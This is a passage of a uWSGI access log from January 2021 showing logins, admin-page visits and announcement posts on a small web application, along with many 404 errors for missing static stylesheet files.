661|app: 0|req: 1827/2314] 219.228.146.135 () {48 vars in 1018 bytes} [Thu Jan 14 11:56:31 2021] POST /single/7/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1828/2315] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 11:56:31 2021] GET /single/7/ => generated 9061 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1829/2316] 219.228.146.135 () {40 vars in 938 bytes} [Thu Jan 14 11:56:34 2021] GET /ownpublish-0-0-0 => generated 9955 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1830/2317] 219.228.146.135 () {48 vars in 1039 bytes} [Thu Jan 14 11:56:37 2021] POST /ownpublish-0-0-0 => generated 27 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1831/2318] 219.228.146.135 () {40 vars in 945 bytes} [Thu Jan 14 11:56:37 2021] GET /ownpublish-0-0-0 => generated 9489 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1832/2319] 180.160.48.43 () {40 vars in 873 bytes} [Thu Jan 14 11:57:30 2021] GET /login/ => generated 6428 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1833/2320] 180.160.48.43 () {40 vars in 880 bytes} [Thu Jan 14 11:57:31 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1834/2321] 180.160.48.43 () {48 vars in 966 bytes} [Thu Jan 14 11:57:33 2021] POST /my-admin/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1835/2322] 180.160.48.43 () {40 vars in 887 bytes} [Thu Jan 14 11:57:33 2021] GET /admin-home/ => generated 14432 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1836/2323] 180.160.48.43 () {38 vars in 834 bytes} [Thu Jan 14 11:57:33 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1837/2324] 180.160.48.43 () {38 vars in 847 bytes} [Thu Jan 14 11:57:33 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1838/2325] 180.160.48.43 () {38 vars in 839 bytes} [Thu Jan 14 11:57:33 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1839/2326] 180.160.48.43 () {38 vars in 803 bytes} [Thu Jan 14 11:57:33 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1840/2327] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 11:57:33 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1841/2328] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 11:57:33 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1842/2329] 180.160.48.43 () {38 vars in 879 bytes} [Thu Jan 14 11:57:33 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1843/2330] 180.160.48.43 () {38 vars in 771 bytes} [Thu Jan 14 11:57:33 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1844/2331] 180.160.48.43 () {38 vars in 769 bytes} [Thu Jan 14 11:57:33 2021] GET /static/css/animate.css => generated 3513 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1845/2332] 180.160.48.43 () {40 vars in 894 bytes} [Thu Jan 14 11:57:35 2021] GET /announcement/ => generated 9146 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1846/2333] 180.160.48.43 () {38 vars in 835 bytes} [Thu Jan 14 11:57:35 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1847/2334] 180.160.48.43 () {38 vars in 847 bytes} [Thu Jan 14 11:57:35 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1848/2335] 180.160.48.43 () {38 vars in 879 bytes} [Thu Jan 14 11:57:35 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1849/2336] 180.160.48.43 () {38 vars in 803 bytes} [Thu Jan 14 11:57:35 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1850/2337] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 11:57:35 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1851/2338] 180.160.48.43 () {38 vars in 839 bytes} [Thu Jan 14 11:57:35 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1852/2339] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 11:57:35 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1853/2340] 180.160.48.43 () {38 vars in 769 bytes} [Thu Jan 14 11:57:35 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1854/2341] 180.160.48.43 () {38 vars in 771 bytes} [Thu Jan 14 11:57:35 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1856/2342] 180.160.48.43 () {40 vars in 897 bytes} [Thu Jan 14 11:58:08 2021] GET /announcement/? => generated 9146 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1856/2343] 180.160.48.43 () {48 vars in 980 bytes} [Thu Jan 14 11:58:08 2021] POST /announcement/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1857/2344] 180.160.48.43 () {38 vars in 835 bytes} [Thu Jan 14 11:58:08 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1858/2345] 180.160.48.43 () {38 vars in 847 bytes} [Thu Jan 14 11:58:08 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1859/2346] 180.160.48.43 () {38 vars in 839 bytes} [Thu Jan 14 11:58:08 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1860/2347] 180.160.48.43 () {38 vars in 879 bytes} [Thu Jan 14 11:58:08 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1861/2348] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 11:58:08 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1862/2349] 180.160.48.43 () {38 vars in 803 bytes} [Thu Jan 14 11:58:08 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 32 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1863/2350] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 11:58:08 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1864/2351] 180.160.48.43 () {38 vars in 771 bytes} [Thu Jan 14 11:58:08 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1865/2352] 180.160.48.43 () {38 vars in 769 bytes} [Thu Jan 14 11:58:08 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1866/2353] 180.160.48.43 () {40 vars in 897 bytes} [Thu Jan 14 11:58:11 2021] GET /announcement/ => generated 10021 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1867/2354] 180.160.48.43 () {38 vars in 835 bytes} [Thu Jan 14 11:58:11 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1868/2355] 180.160.48.43 () {38 vars in 847 bytes} [Thu Jan 14 11:58:11 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1869/2356] 180.160.48.43 () {38 vars in 803 bytes} [Thu Jan 14 11:58:11 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1870/2357] 180.160.48.43 () {38 vars in 839 bytes} [Thu Jan 14 11:58:11 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1871/2358] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 11:58:11 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1872/2359] 180.160.48.43 () {38 vars in 879 bytes} [Thu Jan 14 11:58:11 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1873/2360] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 11:58:11 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1874/2361] 180.160.48.43 () {38 vars in 771 bytes} [Thu Jan 14 11:58:11 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1875/2362] 180.160.48.43 () {38 vars in 769 bytes} [Thu Jan 14 11:58:11 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1877/2363] 180.160.48.43 () {40 vars in 897 bytes} [Thu Jan 14 12:00:02 2021] GET /announcement/? => generated 10021 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1877/2364] 180.160.48.43 () {48 vars in 981 bytes} [Thu Jan 14 12:00:02 2021] POST /announcement/ => generated 27 bytes in 22 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1878/2365] 180.160.48.43 () {38 vars in 847 bytes} [Thu Jan 14 12:00:02 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1879/2366] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 12:00:02 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 33 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1880/2367] 180.160.48.43 () {38 vars in 803 bytes} [Thu Jan 14 12:00:02 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1881/2368] 180.160.48.43 () {38 vars in 835 bytes} [Thu Jan 14 12:00:02 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1882/2369] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 12:00:02 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1883/2370] 180.160.48.43 () {38 vars in 839 bytes} [Thu Jan 14 12:00:02 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 86 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1884/2371] 180.160.48.43 () {38 vars in 879 bytes} [Thu Jan 14 12:00:02 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1885/2372] 180.160.48.43 () {38 vars in 771 bytes} [Thu Jan 14 12:00:02 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1886/2373] 180.160.48.43 () {38 vars in 769 bytes} [Thu Jan 14 12:00:02 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1887/2374] 180.160.48.43 () {40 vars in 897 bytes} [Thu Jan 14 12:00:04 2021] GET /announcement/ => generated 10914 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1888/2375] 180.160.48.43 () {38 vars in 835 bytes} [Thu Jan 14 12:00:04 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1889/2376] 180.160.48.43 () {38 vars in 847 bytes} [Thu Jan 14 12:00:04 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1890/2377] 180.160.48.43 () {38 vars in 803 bytes} [Thu Jan 14 12:00:04 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1891/2378] 180.160.48.43 () {38 vars in 839 bytes} [Thu Jan 14 12:00:04 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1892/2379] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 12:00:04 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1893/2380] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 12:00:04 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 29 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1894/2381] 180.160.48.43 () {38 vars in 879 bytes} [Thu Jan 14 12:00:04 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1895/2382] 180.160.48.43 () {38 vars in 771 bytes} [Thu Jan 14 12:00:04 2021] GET /static/css/spinners.css => generated 3516 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1896/2383] 180.160.48.43 () {38 vars in 769 bytes} [Thu Jan 14 12:00:04 2021] GET /static/css/animate.css => generated 3513 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1898/2384] 180.160.48.43 () {40 vars in 896 bytes} [Thu Jan 14 12:01:52 2021] GET /announcement/? => generated 10914 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1898/2385] 180.160.48.43 () {48 vars in 979 bytes} [Thu Jan 14 12:01:52 2021] POST /announcement/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1899/2386] 180.160.48.43 () {38 vars in 834 bytes} [Thu Jan 14 12:01:52 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1900/2387] 180.160.48.43 () {38 vars in 846 bytes} [Thu Jan 14 12:01:52 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1901/2388] 180.160.48.43 () {38 vars in 802 bytes} [Thu Jan 14 12:01:52 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1902/2389] 180.160.48.43 () {38 vars in 838 bytes} [Thu Jan 14 12:01:52 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1903/2390] 180.160.48.43 () {38 vars in 822 bytes} [Thu Jan 14 12:01:52 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1904/2391] 180.160.48.43 () {38 vars in 822 bytes} [Thu Jan 14 12:01:52 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1905/2392] 180.160.48.43 () {38 vars in 878 bytes} [Thu Jan 14 12:01:52 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1906/2393] 180.160.48.43 () {38 vars in 770 bytes} [Thu Jan 14 12:01:52 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1907/2394] 180.160.48.43 () {38 vars in 768 bytes} [Thu Jan 14 12:01:52 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1908/2395] 180.160.48.43 () {40 vars in 896 bytes} [Thu Jan 14 12:01:54 2021] GET /announcement/ => generated 11847 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1909/2396] 180.160.48.43 () {38 vars in 834 bytes} [Thu Jan 14 12:01:54 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1910/2397] 180.160.48.43 () {38 vars in 846 bytes} [Thu Jan 14 12:01:54 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1911/2398] 180.160.48.43 () {38 vars in 838 bytes} [Thu Jan 14 12:01:54 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1912/2399] 180.160.48.43 () {38 vars in 822 bytes} [Thu Jan 14 12:01:54 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1913/2400] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 12:01:54 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1914/2401] 180.160.48.43 () {38 vars in 802 bytes} [Thu Jan 14 12:01:54 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1915/2402] 180.160.48.43 () {38 vars in 879 bytes} [Thu Jan 14 12:01:54 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1916/2403] 180.160.48.43 () {38 vars in 771 bytes} [Thu Jan 14 12:01:54 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1917/2404] 180.160.48.43 () {38 vars in 769 bytes} [Thu Jan 14 12:01:54 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1918/2405] 180.160.48.43 () {38 vars in 825 bytes} [Thu Jan 14 12:02:03 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1919/2406] 180.160.48.43 () {48 vars in 958 bytes} [Thu Jan 14 12:02:07 2021] POST /login/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1920/2407] 180.160.48.43 () {40 vars in 873 bytes} [Thu Jan 14 12:02:07 2021] GET /home/ => generated 10095 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2408] 180.160.48.43 () {40 vars in 861 bytes} [Thu Jan 14 12:02:07 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1921/2409] 180.160.48.43 () {40 vars in 878 bytes} [Thu Jan 14 12:02:20 2021] GET /publish/ => generated 5234 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) 